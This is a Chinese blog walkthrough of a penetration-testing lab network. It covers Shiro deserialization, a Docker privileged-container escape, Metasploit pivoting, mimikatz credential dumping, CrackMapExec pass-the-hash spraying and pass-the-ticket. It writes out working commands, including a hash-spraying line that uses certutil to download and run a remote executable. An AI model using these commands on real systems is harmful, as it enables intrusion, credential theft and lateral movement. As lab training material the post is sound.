VPC4-通达oa-docker逃逸-shiro反序列化-hash传递-CrackMapExec喷射-历史ptt攻击-进程注入

由于本人是菜鸡,不会免杀,所有免杀的部分就直接跳过了

(hhh)

靶场地址:

链接: https://pan.baidu.com/s/1Fh1Zg79n1yjCPe6rrQ2apA 提取码: qiag

第一台ubuntu(docker逃逸,shiro反序列化)

fscan扫到一台机器

发现remember me,怀疑存在shiro反序列化漏洞

反弹到kali上

ls -al发现根目录有docker文件,说明我们可能在docker中

cat /proc/self/status | grep CapEff(发现存在特权逃逸)

查看目录:fdisk -l

mkdir /test && mount /dev/sda1 /test

(把原始机里面的机器移动到 /test里面)

发现了真机的目录的东西

进入里面

更改里面的密钥为自己kali主机的密钥对文件

将这个值复制到

直接ssh连接

上线msf

生成后门后,启动服务

第二种信息收集方式,frp

然后连接fscan开始扫描

第二台(通达oa)

上线msf

第一台主机建立路由

run post/multi/manage/autoroute

第三台 第四台密码喷射

hashdump导出所有的hash

或者用mimikatz导出、

两个口令

第一种:mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"

第二种:

mimikatz # privilege::debug

mimikatz # token::elevate

mimikatz # lsadump::sam

CrackMapExec-密码喷射

proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth

发现有两个成功的(出现这(Pwn3d!)就表示成功的)

监听

proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.11/1979.exe 1979.exe & 1979.exe"

成功上线

第五台(历史ptt攻击)

未导出票据之前

导出票据:

mimikatz sekurlsa::tickets /export

查看票据:shell klist

利用票据连接:shell dir \owa2010cn-god\c$

因为可能是system或者administrator权限,所有可能连接不上,就尝试进程注入到域用户上

ps查看进程

migrate

相关推荐
飞询5 分钟前
部署 coze-loop
docker·coze
龙卷风040518 分钟前
使用本地IDEA连接服务器远程构建部署Docker服务
后端·docker
呉師傅29 分钟前
佳能iR-ADV C5560复印机如何扫描文件到电脑
运维·网络·windows·计算机外设·电脑
半梦半醒*1 小时前
Linux网络管理
linux·运维·网络·centos·运维开发
破刺不会编程1 小时前
linux线程概念和控制
linux·运维·服务器·开发语言·c++
Nightwish52 小时前
Linux随记(二十一)
linux·运维·服务器
终端行者2 小时前
k8s之Ingress服务接入控制器
云原生·容器·kubernetes
qq_430908573 小时前
网络安全-机遇与挑战
安全
IT成长日记4 小时前
【自动化运维神器Ansible】Ansible常用模块之File模块详解
运维·自动化·ansible·file·常用模块
獭.獭.4 小时前
Linux -- 文件【上】
linux·运维·服务器·进程·pcb